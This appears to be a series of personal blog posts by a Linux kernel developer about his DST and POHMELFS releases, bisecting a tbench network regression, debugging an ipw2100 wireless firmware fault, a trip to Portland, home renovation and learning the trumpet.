After about 10 years of helping to administer the 2ka.mipt.ru servers,
starting from the time we first learned what security is, after I rooted that machine,
I decided to retire and move my mail system to a different place,
as I did with the web long ago. The 2ka server has too many problems which are
not fixed by the admins, and they are completely unmotivated to do so. Since I like
my emails, I'm switching.
And since I started this, I also decided to switch the blog engine and the domain.
Greet www.ioremap.net
My mail contact is zbr_ioremap.net now, and all 2ka mail will be forwarded there.
This blog will not be updated and will redirect you to the new location in 20 seconds.
See you in the new place, it's cool and will get even better with time.
Andrew Morton named (somewhat angrily imho :) the lack of documentation
for the DST
as a review-stopper, so I cleaned up some simple stuff he reported (like
style changes, kcalloc() instead of kzalloc(),
config dependency and other such things) and wrote about 500 lines of code documentation.
Not that much, but it is a bit more than 10% of the whole DST project:
I turned on my warm floor in the bathroom, and it's doing very well (I sometimes
move there just to warm myself for a while; I will change the windows next year,
since it is already quite cool).
I also created a kind of chair out of several stools stacked one on another,
since my table
is really high and so requires an appropriate chair.
I like my apartment more and more. I have been working every day for many years already,
not distinguishing morning from evening or weekends from working days. For the last 7-8 years I worked
most of the time in the office; I just did not like to work at home and did not know
why.
I think now I know the reason: the home place usually was not appropriately arranged and prepared.
Now with my own loft, an egoistically designed environment, custom-made things (like
a table specially designed for a computer-like workload with lots of different
things used in conjunction), which I just love to have and work with,
with the way my apartment has developed, I like to stay here (am I a misanthrope and egoist? :).
The last couple of weekends I spent here hacking on some projects (great thanks to The One
who created datacenters and the reverse tunnel in openssh), which is a very strange thing, since
I do not remember when I last stayed at home for more than a day and it was not related to some sickness.
Long ago I knew how hardware looks and actually made
some simple boards. Not with much success, but I never
studied it at all, so I did not expect anything serious
(in those days "Bugs"
was my favourite film; now I know a little bit more and understand
that it was a bit wrong :).
Abr, who recently completed his PhD, presented me (almost a year ago :)
with a simple integrated circuit construction set:
K8055 -
a USB interface board with 5 digital input channels and 8 digital output channels,
two analogue inputs and two analogue outputs with 8 bit resolution.
I spent half of the day soldering it today (it was quite a simple task,
since the board was already made and all parts were marked), and now the board is ready.
Unfortunately I do not have an appropriate USB connector (the square one) to test
it, so it just lies here and reminds me that I actually do like such things very much.
Really very much, but I know virtually nothing about ICs, and even in the best days
at university I did not know enough. I would like to start playing with ICs now. Thinking...
It was reported recently that tbench has a long history of regressions,
starting at least from the 2.6.23 kernel. I verified that in my test
environment tbench
'lost'
more than 100 MB/s, from 470 down to 355 MB/s for 8 threads,
between at least 2.6.24 and 2.6.27. The 2.6.26-2.6.27 performance regression
on my machines roughly corresponds to a drop from 375 down to 355 MB/s.
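To put those numbers in proportion, here is a minimal sketch that turns the quoted throughputs into relative losses. The helper name relative_drop is made up for this illustration; the figures are the ones quoted above.

```python
def relative_drop(before_mb_s, after_mb_s):
    """Return the throughput loss as a percentage of the starting value."""
    return 100.0 * (before_mb_s - after_mb_s) / before_mb_s


# Throughput for 8 tbench threads, as quoted in the text.
total = relative_drop(470, 355)        # 2.6.24 -> 2.6.27
last_window = relative_drop(375, 355)  # 2.6.26 -> 2.6.27

print(f"2.6.24 -> 2.6.27: {total:.1f}% lost")
print(f"2.6.26 -> 2.6.27: {last_window:.1f}% lost")
```

So the last release window accounts for only a small part of the overall loss; most of it has to come from earlier kernels.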
I spent several days (please do not think that I'm bored and have
nothing to do: there are really interesting things to work on,
but since I already started...) on various tests and bisections (unfortunately
bisect cannot always point to the 'right' commit), and found the following
problems.
First, related to the network, as lots of people expected: TSO/GSO over
loopback with the tbench workload eats about 5-10 MB/s, since the TSO/GSO frame
creation overhead is not paid back by the optimized super-frame processing
gains. Since TSO/GSO brings a really impressive improvement in big-packet
workloads, it was (likely) decided not to add a patch for this, but
instead one can disable TSO/GSO via ethtool. The TSO/GSO change itself was added in
the 2.6.27 window, so it has its part in that regression.
The second part of the 26-27 window regression (I remind you, it is about 20
MB/s) is related to the scheduler changes, which was expected by another
group of people. I tracked it down to the a7be37ac8e1565e00880531f4e2aff421a21c803
commit, which, when reverted, returns 2.6.27 tbench performance to the highest
(for 2.6.26-2.6.27) 365 MB/s mark. I also tested the tree stopped at the above commit itself,
i.e. not 2.6.27, and got 373 MB/s, so likely other changes in that merge
ate a couple of megs.
A curious reader can ask: where did we lose another 100 MB/s? This small
issue was not detected (or at least not reported to netdev@ with a provocative
enough subject), and it happened to live somewhere in the 2.6.24-2.6.25 changes.
I was lucky enough to 'guess' (just after a couple of hundred compilations)
that it corresponds to the 8f4d37ec073c17e2d4aa8851df5837d798606d6f commit about
high-resolution timers. I sent a patch, based on a revert of the above commit,
to the mailing lists and developers; unfortunately it is impossible to cleanly revert
it in 2.6.25, not to mention the 2.6.27 tree. That patch brings
performance of the 2.6.25 kernel tree to 455 MB/s.
There are still about 20 MB/s missing, since 2.6.24 has 475 MB/s, so
likely the bug lives between 2.6.24 and the above 8f4d37ec073 commit, but this exercise
I left to Ingo and Peter :)
Sigh, it is past 3 A.M. in Moscow. I think if I were on drugs stronger than Linux
kernel hacking, all my organs would have run away from me long ago...
For the last several days I bisected the 26-27 kernel window at least 4 times,
trying to find out where the bug lives. Unfortunately every time I ended up
with some obscure patches, which do not even touch the x86 arch, not to mention the
network. Like avr32 or s390 patches, which do not even show up in my config.
And I do have changesets between the two major releases which
have a 15 MB/s difference between them. I do not know exactly how bisect works
in particular (I think it is a binary search over the changesets, but for example I
do not know if it enters a merge commit or just takes it as one) or git
in general, so I will make a last try to find the problem place in the 26-27 window
by manually selecting changesets to try and checking the result. If I do not succeed there,
I will move to the 23-24 and 22-23 windows with the usual bisect and return
to the current tree later. I think I've found a way to run two tests in parallel,
so things may run a little bit faster... The second machine just started to test 23-24,
which has the biggest drop.
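The binary search guessed at above can be sketched as follows. This is only an illustration on a linear list of commits, not how git is implemented: real history is a graph with merges, which this sketch does not model, and the names bisect_first_bad and is_bad are made up here. It also assumes the test gives a clean good/bad answer, which a noisy benchmark with a 15 MB/s difference may not do.

```python
def bisect_first_bad(commits, is_bad):
    """Find the first bad commit in a linear history.

    commits is ordered oldest to newest; commits[0] is known to be good
    and commits[-1] is known to be bad. is_bad(commit) stands for
    "build this commit, boot it and run the benchmark".
    """
    good, bad = 0, len(commits) - 1
    tested = 0
    while bad - good > 1:
        mid = (good + bad) // 2
        tested += 1
        if is_bad(commits[mid]):
            bad = mid      # regression is at mid or earlier
        else:
            good = mid     # regression is after mid
    return commits[bad], tested


# Hypothetical history of 1000 commits where the regression starts at c700.
history = [f"c{i}" for i in range(1000)]
first_bad, builds = bisect_first_bad(history, lambda c: int(c[1:]) >= 700)
print(first_bad, builds)
```

Each step halves the remaining range, so about ten builds are enough for a thousand commits. A single wrong verdict sends the search into the wrong half, which may be one way to end up at unrelated avr32 or s390 patches.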
I do not understand.
I just cannot get it: why is it so hard for me to play reliably
in the second octave? I mean play, and not just make a sound.
I can produce sounds up to concert F, maybe G/G# (trumpet G and A/A# accordingly)
in the second octave, probably sometimes higher (the battery in my
KORG AW-1
tuner is discharged), but cannot play a simple trumpet A-A#-C-D-E-F
(concert G-G#-Bb-C-D-Eb) scale. It is just the first-to-second octave transition,
and although I can play each sound, I cannot play them in a row.
This day has come: the new, completely rewritten locking subsystem in
POHMELFS.
The release day!
The following changes were made:
The new distributed locking subsystem. Locks were prepared to be byte-range,
but since all Linux filesystems lock the whole inode, it was decided to lock the whole
object during writing. The actual messages being sent for the locking/cache coherency protocol
are byte-range, but because the whole inode is locked and the lock is cached, the range actually
is equal to inode->i_size. One can simultaneously write into the same page
at different offsets from different clients, and every time the file will be coherent on all
clients which do it and on the server itself.
Documentation update. Fixed by Adam Langley (agl_imperialviolet.org)
Add/del/show commands patch from Varun Chandramohan (varunc_linux.vnet.ibm.com)
Bug fixes and cleanups.
Get the latest version from
archive
or via GIT tree.
Alexandre Lissy (alexandre.lissy_smartjog.com) made a
patch
for the latest to date Valgrind version (3.2.1).
Now one can analyze performance bottlenecks with
netchannels applications
using standard techniques.
So far it produced not bad results. But not good either.
I see locking messages and they are in the right order and file content
is not damaged, but clients frequently give up on a timeout waiting for the
lock to be granted. Since the lock release process requires the inode to be
unlocked (so it could be found and locked by the thread which received the
network packet), this indeed may take too long on slow media and disks,
since locking has to wait until data is written, for example wait for writeback
completion or for page reading, if the pages were not in the cache yet.
I tested
POHMELFS
locks in Xen domains, where network speed is limited
to 3 MB/s, and writing one million (or ten million, that may be the point)
8-byte entries at different offsets (with a sequential step of 128 bytes) took more
than 50 seconds, so the 5-second default lock timeout may not be enough.
That's the theory; in practice I need to test different timeouts and actually
run on real machines, but here comes another problem. I have three quite fast
SMP machines with lots of RAM connected over gigabit ethernet, which can be used
however I like. But...
The first one was essentially killed by
tbench regression
testing. They all have a long history of problems with disks or SCSI controllers,
and now it happens again: the first machine boots only with a single 2.6.22 Debian kernel,
anything else (including vanilla 2.6.22) fails to read data from the software raid
partition, although disks are detected correctly.
Another machine is actively used for the aforementioned tbench regression testing;
it takes quite a long time to boot it and run tests, so things are slow enough.
And the last one is used to control IPMI, since it is the only way I have to reboot them,
so when I managed to freeze all three, I needed to contact people who needed to contact people
who needed to hard reset the machines in the datacenter and put them into BIOS, since the existing
KVM switches are stupid enough not to respond to the keyboard when a machine has died.
So, I'm a bit forced to spread efforts in several different directions,
but nevertheless there is a little bit of time for the new things:
$ ./elliptics -c ./elliptics.conf
2008-10-07 01:03:39.430198 12778 Logging has been started.
2008-10-07 01:03:39.430559 12778 Successfully initialized 'sha1' hash.
2008-10-07 01:03:39.430641 12778 Node id: b551803fd74ff5590ed38f6ce8a10a2e577b2a9e
2008-10-07 01:03:39.431076 12778 Server is now listening at 127.0.0.1:1025.
$ cat elliptics.conf
#
# This is a simple config file for the elliptics network.
# Note, that spaces are skipped before and after the '=' delimiter.
#
log = /dev/stdout
hash = sha1
id = This is id string
#numeric_id = 1234567890abcdefffffffffffffffffffffffa
root = /tmp
addr = 127.0.0.1:1025:2
#addr = ::1:1025:10
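The format shown above (one key = value pair per line, '#' comment lines, spaces skipped around the '=' delimiter) is simple enough to read in a few lines. The following is a minimal sketch of such a reader, not the parser elliptics actually uses; the function name parse_config is made up, and the meaning of the individual values (for example the third field in addr) is not interpreted here.

```python
def parse_config(text):
    """Parse 'key = value' lines; lines starting with '#' are comments."""
    config = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue  # no '=' on the line; ignored in this sketch
        # Spaces before and after the '=' delimiter are skipped.
        config[key.strip()] = value.strip()
    return config


sample = """\
#
# This is a simple config file for the elliptics network.
#
log = /dev/stdout
hash = sha1
id = This is id string
#numeric_id = 1234567890abcdefffffffffffffffffffffffa
root = /tmp
addr = 127.0.0.1:1025:2
#addr = ::1:1025:10
"""
config = parse_config(sample)
print(config)
```

Only the first '=' splits the line, so values may contain spaces or further '=' characters, as the id string does.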
That will be an excellent project (maybe even my best one to date :),
which will be used in... More details when things are ready.
I like the idea, so maybe it will give a name for my new site, like
noelliptics.net. Not yet though.
That's how my shower cabin and bathroom corner look now.
It took me virtually years to make this, but practically a day to install the cabin,
and still the bathroom is not completed yet. I need to finish the tile gluing and the water
hatch installation.
I also need to complete the brick tile gluing (roughly 7 square meters of walls in the kitchen),
which likely will be done together with the bathroom gluing.
There is a lot of work, but actually not as much as it may look at first sight.
I just need a special development mood to start doing it well and fast, which, like a muse,
does not come on demand.
I've completed a small rewrite of the distributed locks in
POHMELFS.
They can be byte-range, but since Linux VFS locks the whole inode
during writing, I decided to implement the simpler approach first,
so although clients send byte-range locks, the server locks the whole
object.
If there is simultaneous writing to the object, only one writer is allowed
at a time. Write locks are grabbed at write time, read locks at read time. Writing
is still handled via writeback, so all caching facilities persist. Locks are 'cached',
i.e. if an inode was locked and no one else tried to update it, no new lock messages
are sent between server and client. A lock release message (initiated by another client
who wants to start writing into the same file) forces inode writeback on the current
lock owner.
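The effect of lock caching on the number of messages can be shown with a toy model. This is a sketch under loud assumptions, not POHMELFS code: the Server and Client classes and their methods are invented for the illustration, the release happens synchronously inside the grab call, and no data is actually transferred to the server.

```python
class Server:
    """Whole-object write lock: at most one owning client per object."""

    def __init__(self):
        self.owner = {}    # object name -> owning Client
        self.messages = 0  # lock messages exchanged, for illustration

    def grab(self, obj, client):
        self.messages += 1                 # lock grab from the client
        current = self.owner.get(obj)
        if current is not None and current is not client:
            self.messages += 1             # release request to the owner
            current.release(obj)
        self.owner[obj] = client


class Client:
    def __init__(self, name, server):
        self.name = name
        self.server = server
        self.owned = set()   # locks cached on this client
        self.dirty = {}      # object -> {offset: byte}, not written back yet
        self.writebacks = 0

    def write(self, obj, offset, byte):
        if obj not in self.owned:          # lock is not cached: ask the server
            self.server.grab(obj, self)
            self.owned.add(obj)
        self.dirty.setdefault(obj, {})[offset] = byte

    def release(self, obj):
        # Forced writeback of the cached data, then drop the cached lock.
        if self.dirty.pop(obj, None):
            self.writebacks += 1
        self.owned.discard(obj)


server = Server()
a, b = Client("a", server), Client("b", server)
for off in range(0, 10, 2):
    a.write("file", off, 1)   # one grab message, later writes use the cache
b.write("file", 3, 2)         # grab plus a release request sent to a
print(server.messages, a.writebacks)
```

Five writes from the first client cost a single lock message; the second writer then costs two more messages and one forced writeback on the previous owner.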
I've started a testing process, so far quite trivial, but I plan to write a simple
application which will simultaneously write into the same file from different clients
at different offsets (like the first client writes each second byte, the second client writes
each third byte and so on) and check the result. If everything is ok, I will release a new
version this weekend and start implementing the really cool distributed facilities
I plan to have in POHMELFS. They will first be implemented as a library, so that anyone could
use it to create a distributed storage without patching a kernel (but with its own API though,
I do not want to mess with FUSE).
After I found
a small fix for the tbench regression over loopback, I decided to run some tests with it.
As was expected, turning off TSO/GSO does not fix the whole issue: performance increased from 366 MB/s up to 381 MB/s,
which is still less than the 398 MB/s of 2.6.26-slub.
Another interesting issue I found is the SLAB vs SLUB difference. The former is always faster (about 5-7 MB/s difference):
366 vs 361 MB/s for 2.6.27-rc7 and 381 vs 374 MB/s when TSO and GSO are turned off. Pekka Enberg suggested reverting the
5595cffc8248e4672c5803547445e85e4053c8fc commit, which could be the cause of this performance degradation, but without
this commit SLUB behaves a little bit slower: 372 vs 374 MB/s.
Next I will try to find out why there is a huge drop between 2.6.23 and 2.6.24 (54 MB/s).
It brought me back about 4% in a Xen domain with 256 MB of RAM
in a 4-client tbench test:
current: 187 MB/s
patched: 194 MB/s
The patch is rather trivial: it disables TSO and GSO on loopback
and generically on devices which are capable of scatter-gather
(where it was automatically enabled by the e5a4a72d4f8 commit, which
I bisected to be guilty). Actually the TSO disablement part provided more gain than GSO on SG devices.
The idea behind those patches is clear: we create a bigger packet, so we should have
a smaller overhead of its processing, but apparently the GSO/TSO packet creation
overhead dominates, on loopback at least.
All three of my (big) test machines died in various (apparently unbootable) bisections,
so I tested it in a small and very slow Xen domain. Because of that I did not run the
2.6.22 kernel, since git operations and compilation take ages on this 'machine'.
For example I was only able to perform about a dozen or so git checkouts/resets/bisections
and compilations in the whole day.
I've posted the patch to netdev@, let's see the result.
I forgot to mention that I wanted to sell this patch for a DST, POHMELFS or netchannels
patch review the next time I post them :)
It was reported that, starting from 2.6.23, the Linux kernel has a continuous
network-related regression, which results in more than 20% performance degradation.
I checked it, and got interesting results.
It is better to see it once than to hear about it 1000 times.
Yes, we suck!
I decided to try to fix these issues, and started to bisect 2.6.22->2.6.23 and 2.6.26->2.6.27 on
two identical machines, which have 4 logical CPUs (HT enabled) and 4 GB of RAM.
The result was quite surprising: the second bisection step in 22->23 froze the machine
in the middle of the compilation, and the first bisection step in 26->27 did not boot.
Since I ran it remotely, there will be no progress on this until tomorrow.
Finally it looks like there are no killing bugs
or noticeably bad features in the distributed storage.
Yesterday I pushed a change to drop a wrong debug, which might have resulted in a crash; also a couple
of comment cleanups are waiting to be pushed, and likely that's it. It will be the last release,
if there are no new feature requests or bugs found.
So, I switched back to the POHMELFS
development from DST.
To be really cool in cache coherency collisions, POHMELFS requires a new locking/coherency mechanism, which
I implement similarly to the MOESI cache coherency protocol.
This basically means a floating lock for a given object,
which may be owned by only one client at a time, not counting readers: they just receive a message that their
data is not valid anymore.
First, I changed the userspace management of the inode cache: now there is only a single tree of all objects
which were ever opened by any client. When a client disconnects or drops an inode locally, it is removed from the
server's cache as well.
Next, there will be a special command to grab/release a lock, which is only sent by writers.
When a writer starts its dirty job of damaging shared data, it sends a lock grab message to the server with
the requested range, which in turn is broadcast to the other writers; only a single writer is allowed to own a given area.
Then the server proceeds with its usual tasks of cooking or waiting for IO. Eventually the owner of the lock
decides to release it: for example, after the above message from the server it can flush data to the server
and send a lock release message, or it can do so just on its own. The server then checks if the given area is now free and sends a lock
completion message to the requester. The new owner receives the message, marks the inode as owned and starts writing there.
Any subsequent write, if the inode is marked as owned, does not result in an additional lock message.
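The message flow of this plan, seen from the server, can be sketched as a small state machine. This is an illustration only and not the POHMELFS server: the LockServer class and the message names are invented, byte ranges are not modeled (one lock per object), and the flush of data before the release is left out.

```python
from collections import deque


class LockServer:
    """One floating write lock per object, handed over on release."""

    def __init__(self):
        self.owner = {}    # object -> id of the owning client
        self.waiting = {}  # object -> deque of clients waiting for the lock
        self.sent = []     # log of (destination, message) pairs

    def grab(self, obj, client):
        owner = self.owner.get(obj)
        if owner is None:
            # Object is free: grant the lock immediately.
            self.owner[obj] = client
            self.sent.append((client, "lock-completion"))
        elif owner != client:
            # Queue the requester and ask the owner to give the lock up.
            self.waiting.setdefault(obj, deque()).append(client)
            self.sent.append((owner, "release-request"))

    def release(self, obj, client):
        if self.owner.get(obj) != client:
            return  # only the current owner can release
        queue = self.waiting.get(obj)
        if queue:
            new_owner = queue.popleft()
            self.owner[obj] = new_owner
            self.sent.append((new_owner, "lock-completion"))
        else:
            del self.owner[obj]


srv = LockServer()
srv.grab("inode-1", "A")     # A becomes the owner
srv.grab("inode-1", "B")     # B has to wait, A is asked to release
srv.release("inode-1", "A")  # the lock floats to B
print(srv.sent)
```

A byte-range version would keep a list of owned ranges per object and check the requested range for overlaps instead of comparing a single owner.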
So far it looks doable, but I only completed what is called 'first' above :)
If there are no major problems with the other project, I plan to complete this part quickly and move forward.
This happens during PCI ipw2100 device disablement in the reset handler,
so when the interrupt handler sees that, it bails out. It should be generally ok,
but I found a different thing: there is a race between the interrupt handler (the handler
itself and the related processing tasklet) and the
reset code. The latter disables interrupts before starting to turn the adapter on,
but the interrupt handler can be running right now on a given cpu and can schedule
the tasklet, so disabling interrupts does not prevent parallel reading and writing of the
various registers.
The IRQ processing tasklet does register reading and writing under the lock with interrupts
turned off, but the reset tasklet does not protect the initialization path against it, so I wonder
what may happen in this case. Since register reading and writing happens via absolute
addresses (I mean there is no need to write an address register first), this may not be a problem,
but the race still exists and theoretically can harm the system. Similar unguarded accesses exist
in the ipw2100_wx_event_work() handler, and there is also unguarded status field setting
in various places in the driver, which can harm the driver's behaviour too.
So, maybe I decided to blame the firmware a little bit early, although the things I found may
be harmless. I will try to figure this out later tomorrow.
I was not able to force the card to stop sending or receiving packets
with ping tests, although I definitely was able to generate lots
of fatal interrupts with completely different values and addresses.
Frequently the card generates fatal interrupts with different values at the same
address, like below:
They did not follow one after another though.
Different error values likely mean that there is no correlation between
values and addresses, so this information is useless.
I added power state changes to the reset function, so now it does something like this:
As we can see, fatal interrupts did not disappear, and are actually as frequent as before.
I also got these lines:
[ 2032.560413] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560449] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560491] ipw2100: exit - failed to send CARD_DISABLE command
[ 2032.560593] ipw2100: exit - failed to send CARD_DISABLE command
One after another, which does not give me any clue though.
I've started several big torrent downloads/seeds as a big load; maybe the card somehow
differentiates between flows, so this test should be heavier than lots
of pings. I first noticed the fatal interrupt problem with this kind of load,
when the card not only stopped working, but also printed some goodbye message.
So far the conclusion is not very optimistic: fatal interrupts happen always, no matter
what magic is enabled in the reset, which already tells that the firmware is broken.
Hopefully additional reset games with power management will allow the card to work,
even with those interrupts. Time will tell.
This is a maintenance release, which contains the following changes:
Use idr to manage minor numbers. Now a create/remove/create sequence does not
produce a new minor, but reuses the previous one, which is now freed.
Added cache name to the node. It is possible to have a freed node still
being alive while we register a new node with the same name, so its cache name should be different.
Wait during node removal until there are no pending transactions, so the node is
freed in process context and not in the receiving thread itself.
Warn user if there is no security permission config file during
export node initialization. No client will be allowed to connect
without explicit security association.
Tune default size of the page pool for crypto processing a bit.
I want to thank Remy Ritchen (remy.ritchen_gmail.com) for his excellent tests and analysis.
As usual, DST
is available from archive and via
git tree.
I managed to compile a small enough kernel, which boots on
my laptop (I do not know how long it took, since I fell asleep),
and managed to trigger the fatal interrupt error after just several seconds
of ping -f 192.168.1.1 -s 8192 on the freshly booted
machine. 192.168.1.1 is my gateway address.
Here is the result with the patch I posted to the mailing lists,
which was not acked, replied to or commented on though (well, I have to admit
that if I had sent it a couple of mails earlier, it could probably have found its
way into the tree, but I still believe that it would not result in anything,
since everyone knows about this bug, it just is not fixed for some reason).
Intel developers (at least those who maintain the driver) continue to keep silent.
So, these fatal error values and address numbers do not tell me anything,
but since they are always different at different addresses, I think the firmware
just loses its mind and stops responding.
The first line, where ipw2100 fails to send a command, was obtained during
ifdown of the interface. I never saw it before, but I do not think
it is related.
So, I need to move to the office and want to make some
distributed storage
changes, namely fix an issue with a name collision (the kernel already has a dvb card
module called dst.ko), and implement a better minor number allocation
scheme for the imported devices, since right now, after a node was created and destroyed,
a new one will not get the same number, but a continuously increasing one, which looks
confusing and may bring a sysfs initialization error (when the system tries to
register a kobject with an existing name).
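The allocation behaviour wanted here (a released number is handed out again instead of an ever increasing one) can be sketched with a small allocator. This is an illustration in Python with an invented MinorAllocator class; it is not the kernel code and does not use or describe any kernel API.

```python
import heapq


class MinorAllocator:
    """Hand out the lowest free minor number and reuse released ones."""

    def __init__(self):
        self.next_unused = 0  # lowest number that was never handed out
        self.free = []        # min-heap of released numbers

    def alloc(self):
        if self.free:
            return heapq.heappop(self.free)
        minor = self.next_unused
        self.next_unused += 1
        return minor

    def release(self, minor):
        heapq.heappush(self.free, minor)


minors = MinorAllocator()
first = minors.alloc()    # node created
minors.release(first)     # node destroyed
second = minors.alloc()   # node created again: gets the same number
print(first, second)
```

With a plain incrementing counter the second node would get the next number instead, which is the confusing behaviour described above.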
I will continue the ipw2100 experiments tonight if I do not fall asleep again
because of jetlag. Stay tuned!
The last couple of photos were made at the Linux Plumbers Conference (filesystem BoF).
Not all of them got into the gallery though, I need to try to find the missing bits.
I should have taken a real flash instead of using the built-in one, which sometimes mangled the images...
Actually I think I like this city much more than when I first saw it.
It is small, but still alive; it has parks and a river with a long excellent embankment to
walk along (without access to the water though, since it is navigable). There are
interesting buildings and lots of places to take a seat, like restaurants,
cafes and pubs. Once I heard live jazz music from the street, but I was advised to
visit Austin: the capital of live music in the USA.
So, here are a couple of photos
of Portland I made (without any artistic attempts). Several KS and Plumbers photos are pending.
Just sent a patch to
zillions of mailing lists (netdev@, linux-kernel@, linux-wireless@) and
to lots of developers because of its "Fatal interrupt. Scheduling firmware restart." problem.
Let's see if Intel folks will do anything.
I also added a couple of jokes about conspiracy theories (like the bug fires because Intel
forces us to buy a new adapter by this error) to make it a little bit more flammable
and to draw attention. I really hope Intel does not do it intentionally.
Neat toy! The computer itself is actually the size of a finger (not that thick though),
but it does not have a power supply or interface connectors, so it is essentially unusable
as a stand-alone board; with an extension motherboard (as in the picture), however, it becomes very
interesting, with several usb connectors, an hdmi display and audio connectors.
The WiFi/bluetooth module is the wi2wi W2CBW003, based on the Marvell 88W8686 chip. It is pretty
unlikely that Marvell will share documentation (in my experience, if you do not
order more than 1000 chips in a single order you will not be allowed to enter
its intranet and get access to the needed datasheets), so I will not be able to work
on a wireless driver, but I would gladly implement it otherwise.
First, Portland met me with excellent weather. Just bloody perfect,
about 25-30 degrees Centigrade, no rain or cold winds. Very nice.
Second, the hotel is quite good, with a couple of exceptions though: they do not have a
European-to-American electricity socket adapter. They do not even have a meter of wire,
so that I could make one myself. They have an American-to-UK one though.
There are no shops open 24 hours except Starbucks. I found one small food shop though,
which would not
sell me a beer until 7 AM; I was wished a good breakfast with 6 bottles of Bud.
In Moscow it was 6 PM. Actually I think I currently do not suffer from
jetlag anymore, although I wake up at 4-5 AM local time.
Portland is quite a small city. I managed to walk around the central district
in several hours. And it is slow, in the sense that there is no
kind of life flow, no energy, no drive... It is likely a perfect place
to raise children or paint pictures (Portland has excellent nature) though.
I made several photos during the walk around the city (and even listened
to live music at the so-called Portland Saturday Market, where people sell
hand-made stuff, there are a couple of real gems there I think)
as well as Linux kernel summit
ones, but because of slow internet access I will not publish them yet; expect a gallery
update in a week or so.
This is a maintenance-only release of the
DST, which brings us the following changes:
Fixed memory leak in crypto thread initialization error path. Noticed by Sven Wegener (sven.wegener_stealer.net).
Unprotected tree access (exceptionally stupid bug, I was made blind by the electronic equipment), and tricky bug_on catch in scsi
code caused by incorrect bio flag initialization in the exporting node. 64bit alignment fix.
Bugs reported by Rémy Ritchen(
Couple of bogus compilation warnings about uninitialized variables caught by a different compiler.
Allow both read and write permission, not only read or write in security config.
int scsi_setup_fs_cmnd(struct scsi_device *sdev, struct request *req)
{
    struct scsi_cmnd *cmd;
    int ret = scsi_prep_state_check(sdev, req);

    if (ret != BLKPREP_OK)
        return ret;
    /*
     * Filesystem requests must transfer data.
     */
    BUG_ON(!req->nr_phys_segments);
This means that the request structure did not contain any segment to process. Originally
I thought that it was because of some tricky elevator steps, which selected the wrong request queue,
because all debug showed that a sync bio (block IO request with the BIO_RW_SYNC bit set)
is handled differently compared to the same request without this flag. But experiments with various
flags showed that the bug occurs no matter what, just in a completely unpredictable place.
Fortunately I managed to catch it in a debug trap in the block IO merging path, which showed me that
block IO requests with very strange read/write and flags fields were the cause of this error. Looking more
closely at the block queue allocation path, I found that its default initialization is not correct,
and my setup happens before it, so the queue did not contain the right parameters for the maximum request sizes
(hw and phys sectors). This also showed that one block IO request in the export node had the clone and other
local-only fields set, which is very wrong for a bio to be submitted, and which actually resulted in the observed bug.
Those fields were set by the client bio and should not be transferred to the remote one, so I limited the flag fields
to only show that the bio is uptodate and has the blockable IO bit.
That's the story about how things were hacked this day (it's the middle of the night actually, while I'm waiting
for the taxi to take me to the airport), so the
POHMELFS locking algorithm
was not implemented today, and likely is postponed to the next weekend when I return, since I got a
group theory book and made some printouts about number theory (after I finished reading Vinogradov's book),
so I will have something to read in all four planes (two in each direction) if I do not fall asleep,
and likely I will not have much time in Portland:
we will need to talk/listen to other people and check local pubs (people suggested some cocktail places, but I prefer
beer).
I completed the design (without implementation yet :) of the new
locking (or cache coherency mechanism, it does not really matter)
for the shared objects in
POHMELFS.
It is somewhat close to the MOSI (or even MOESI) cache coherency protocol
used in modern CPUs, although it also differs a bit because of the nature
of the POHMELFS server. It can provide byte-range locking for any object,
but so far I will only implement per-file locking (i.e. the whole file will
be 'locked' or 'owned' when a client performs a write, even if another client
could write to a different location in the same object), and if scalability
is not good enough, it can be extended (that is not too complex). Since
all in-kernel filesystems lock the whole inode when performing a write,
this should not be a big problem.
This approach requires changing the POHMELFS server's directory cache, but I
never liked the existing one, since it looks a bit over-engineered.
If things go smoothly, I will complete it tomorrow before flying to the kernel summit
(early Saturday morning), since the idea is really not very complex, and I expect
the implementation to be the same.
Meanwhile, DST
got a fix for the incredibly stupid bug I made. I do not even want to call it a
'bug', it is more likely a tricky blindness created by the electrons moving things around in my
monitor. They forced me not to see an obvious place to lock access to, which resulted
in nasty oopses. The patch is already in the
git tree.
There is another one though: when some SCSI device is being exported and a client performs a
write, the request somehow has a zero req->nr_phys_segments field (which should
be initialized from the block IO request), which triggers a BUG_ON() in the scsi
code. I'm working on it right now.
Playing this known and not too complex song today.
Trumpet has an excellent sound here imho, although I did not always produce
it. Frequently vibratto was mixed into the music, so it became not very interesting.
Nevertheless, when I succeed (note, that I only played it first time today
about 30-40 minutes, so it was not very frequently cool with my trumpet
'experience', maybe one third :), I do like it. Also 15-24 part was not clear to me,
since I do not remember this part of the original song, so played just via
intervals, which sounded, but I think not too good.
Also tried to improvise in the blues pentatonic scale.
Not with much success though. I can play notes and move over the
row with different steps, but it does not sound very good. Likely because
I do not know intervals, and what is being played does not fit an interesting timing.
Unfortunately the couple of books and articles about improvisation I have contain terminology
too specific to music theory, so I frequently just do not understand what it means.
It turned out to be quite interesting to play some random mix of sounds and select those
sets of 3-7 ones, which sounded cool.
This looks like blind man is trying to walk around, but nevertheless I like it...
Stay tuned, maybe eventually I will record some random 'music' I produce out of my trumpet :)
I found it quite simple and interesting to transpose sounds from trumpet
pitch to the piano one, i.e. by raising the sound by a whole tone (two half-tones). It is not
as complex as I thought before, at least if you already know the melody:
I can play from the script (very slowly and without half-tones though),
but can not transpose in real time.
Also found, that playing pedal tones in a mix with the highest (for me
it is very end of the second octave) register does help to bump the highest
notes, and also keeps lips from tiring quickly. Actually after an hour of exercise
today they were almost not tired because of it.
Found some interesting sounds and started to think about music theory.
I do not play very well yet, but I eventually will, it is a matter of practice.
However I do not know music theory at all, and I want to put my musical thoughts
into sound. Usually I fail, so I want to fill this gap.
I think I need to start with the harmony, so searching for a good book about it.
This is a very minor
DST update,
which contains following changes:
sector_t compilation warnings removed.
Debug, init, alloc, whatever cleanups noted by Sven Wegener (sven.wegener_stealer.net).
Some checkpatch.pl masturbation
New name: "Linux benevolent dictator said: there is no spoon, black and white"
Actually I fixed only a small amount of the crap reported by checkpatch.pl,
particularly I did not fix cases of long lines, when it is actually a comment added after
some variable, or things like
    for (i=0; i<n; ++i) and
    struct some_name
    {
        ...
    }
when checkpatch.pl wants
    for (i = 0; i < n; ++i) and
    struct some_name {
        ...
    }
But I tried to remove code lines longer than 80 characters, trailing spaces and
a couple of other warnings.
Now I will concentrate on POHMELFS
